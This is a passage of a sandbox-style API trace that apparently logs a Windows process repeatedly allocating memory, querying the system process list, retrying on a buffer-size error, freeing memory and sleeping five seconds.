RegionSize=0xdea54*=0x20000) returned 0x0 [0264.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.398] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.399] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.405] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.411] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.412] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.414] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.419] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.420] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.426] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.426] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.429] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.433] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.434] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.436] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.441] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.442] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.449] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.452] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.456] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.457] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.464] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.465] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.466] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.469] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.470] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.473] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.478] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.478] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.481] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.485] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.488] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.492] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.494] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.495] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.499] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.499] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.501] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.502] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.502] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.505] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.506] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.507] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.508] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.508] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.512] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.512] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.515] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.518] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.519] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.524] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.525] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.527] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.531] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.532] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.534] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0264.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0264.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0264.540] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0264.540] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0264.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0264.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0264.543] 